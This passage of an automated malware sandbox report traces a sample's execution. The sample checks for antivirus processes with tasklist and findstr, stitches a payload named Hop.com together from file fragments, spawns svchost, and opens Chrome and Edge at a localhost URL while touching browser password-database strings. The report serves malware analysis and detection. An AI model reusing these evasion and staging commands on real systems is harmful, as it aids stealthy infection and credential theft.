                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: svchost.exe, 0000000F.00000003.1909913731.000001C278665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1861406446.000001C278639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1910669488.000001C2786CA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1871444142.0000023A3EA75000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 00000013.00000002.1878280103.0000422C006C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: HI6VIJERUn.exeReversingLabs: Detection: 55%
                      Source: svchost.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile read: C:\Users\user\Desktop\HI6VIJERUn.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\HI6VIJERUn.exe "C:\Users\user\Desktop\HI6VIJERUn.exe"
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 407310
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com Hop.com B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmdJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 407310Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra BJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com Hop.com BJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
